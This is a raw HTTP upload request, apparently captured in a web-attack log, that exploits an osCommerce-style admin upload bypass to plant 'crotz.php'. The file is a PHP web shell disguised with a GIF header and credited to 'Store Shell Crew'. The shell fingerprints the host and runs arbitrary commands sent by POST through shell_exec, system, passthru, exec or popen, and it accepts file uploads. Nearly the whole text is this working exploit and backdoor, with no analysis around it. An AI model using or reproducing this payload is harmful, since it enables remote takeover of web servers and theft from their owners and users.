POST /~tysko/webattacks.2012.04/admin/categories.php/login.php?cPath=&action=new_product_preview HTTP/1.1
TE: deflate,gzip;q=0.3
Connection: TE, close
Host: oucsace.cs.ohiou.edu
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6
Content-Length: 6943
Content-Type: multipart/form-data; boundary=xYzZY
--xYzZY
Content-Disposition: form-data; name="products_image"; filename="crotz.php"
Content-Type: text/plain
GIF89a ? ???????!? ????,???? ? ?? D ?;?
"HTML Tidy for Windows (vers 14 February 2006), see www.w3.org" />
/*################################################################
# Store Shell Private Shell
# Thanks to: Tawi_Pret, Newbie-Herbet, ho1onk ,sohai ,Up , Syndrom2211 ,TeguhMicro , xCrotZ ,gilang ,Hyda
# a5tro ,Harie ,Pro_Wikileaks ,yerros , Topenghitam , Sutul
# all Crew@store-shell.org ,and all Indonesian Hacker
################################################################
*/
function cari_operatingsystem()
{
if(eks("ls")!=""){
$os="NIX*";
}else{
$os="Win*";
}
return $os;
}
function eks($abaaba)
{
$hasil = '';
if (!empty($abaaba))
{
if(function_exists('shell_exec'))
{
$hasil = @shell_exec($abaaba);
}
elseif(function_exists('system'))
{
@ob_start();
@system($abaaba);
$hasil = @ob_get_contents();
@ob_end_clean();
}
elseif(function_exists('passthru'))
{
@ob_start();
@passthru($abaaba);
$hasil = @ob_get_contents();
@ob_end_clean();
}
elseif(function_exists('exec'))
{
@exec($abaaba,$hasil);
$hasil = join("n",$hasil);
}
elseif(@is_resource($lap = @popen($abaaba,"r")))
{
$hasil = "";
while(!@feof($lap)) { $hasil .= @fread($lap,85); }
@pclose($lap);
}
}
return $hasil;
}
?>
if(isset($_GET['wek']))
{
echo "..::Store Shell Crew::..
";
echo "HackeD by xCrotZ
";
$host=$_SERVER['HTTP_HOST'];
$ip = $_SERVER['REMOTE_ADDR'];
$serverip=$_SERVER['SERVER_ADDR'];
$server=$_SERVER['SERVER_SOFTWARE'];
$agent=$_SERVER['HTTP_USER_AGENT'];
$location=$_SERVER['DOCUMENT_ROOT'];
$chdir = getcwd();
$php=phpversion();
$os=cari_operatingsystem();
$user=getuser();
$os2 = @PHP_OS;
echo "Software :" . " " .$server ."
";
echo "Host : " .$host ."
";
echo "My ip : $ip
";
echo "Server Ip : $serverip
";
echo "OS : " . $os2."
";
echo "Kernel : ". wordwrap(php_uname())."
";
echo "User : ". getuser()."
";
echo "MySQL:". testmysql(). " MsSQL:". testmssql(). " GETgreSQL:".GETgresql()." Oracle:".oracle()." cURL:".testcurl()." Wget:".testwget()." Fetch:".testfetch()." Perl:".testperl()." Socket:".socket()."
";
?>
set_magic_quotes_runtime(0);
$currentWD = str_replace("\\\\","\\",$_POST['_cwd']);
$currentCMD = str_replace("\\\\","\\",$_POST['_cmd']);
$UName = `uname -a`;
$SCWD = `pwd`;
$UserID = `id`;
if( $currentWD == "" ) {
$currentWD = $SCWD;
}
if( $_POST['_act'] == "List File" ) {
$currentCMD = "ls -la";
}
print "
";
$currentCMD = str_replace("\\\"","\"",$currentCMD);
$currentCMD = str_replace("\\\'","\'",$currentCMD);
if( $_POST['_act'] == "Upload" ) {
if( $_FILES['_upl']['error'] != UPLOAD_ERR_OK ) {
print "Error Uplaoad Gagal";
} else {
print "";
system("mv ".$_FILES['_upl']['tmp_name']." ".$currentWD."/".$_FILES['_upl']['name']." 2>&1");
print "
Upload File Sukses";
}
} else {
print "\n\n";
$currentCMD = "cd ".$currentWD.";".$currentCMD;
system("$currentCMD 1> /tmp/cmdtemp 2>&1; cat /tmp/cmdtemp; rm
/tmp/cmdtemp");
print "\n\n
-==Store Shell Crew==-";
}
exit;
}
?>
function testperl()
{
if(eks('perl -h'))
{
return "ON";
}else{
return "OFF";
}
}
function testfetch()
{
if(eks('fetch --help'))
{
return "ON";
}else{
return "OFF";
}
}
function testwget()
{
if(eks('wget --help'))
{
return "ON";
}else{
return "OFF";
}
}
function GETgresql()
{
if(function_exists('pg_connect'))
{
return "ON";
}else{
return "OFF";
}
}
function testmssql()
{
if(function_exists('mssql_connect'))
{
return "ON";
}else{
return "OFF";
}
}
function testcurl()
{
if(function_exists('curl_version'))
{
return "ON";
}else{
return "OFF";
}
}
function testmysql()
{
if(function_exists('mysql_connect'))
{
return "ON";
}else{
return "OFF";
}
}
function oracle()
{
if(function_exists('ocilogon'))
{
return "ON";
}else{
return "OFF";
}
}
function socket()
{
if(function_exists('socket_accept'))
{
return "ON";
}else{
return "OFF";
}
}
function getuser()
{
$out = get_current_user();
if($out!="SYSTEM")
{
if(($out=eks('id'))==''){$out = "uid=".getmyuid()."(".get_current_user().") gid=".getmygid();};
}
return $out;
};
function pwd()
{
if($_POST['type']==3)
{
$_SESSION['pwd'] = stripslashes($_POST['value']);
}
chdir($_SESSION['pwd']);
$cwd = getcwd();
if($u=strrpos($cwd,'/'))
{
if($u!=strlen($cwd)-1){
return $cwd.'/';}
else{return $cwd;};
}
elseif($u=strrpos($cwd,'\\'))
{
if($u!=strlen($cwd)-1){
return $cwd.'\\';}
else{return $cwd;};
};
}
?>
--xYzZY--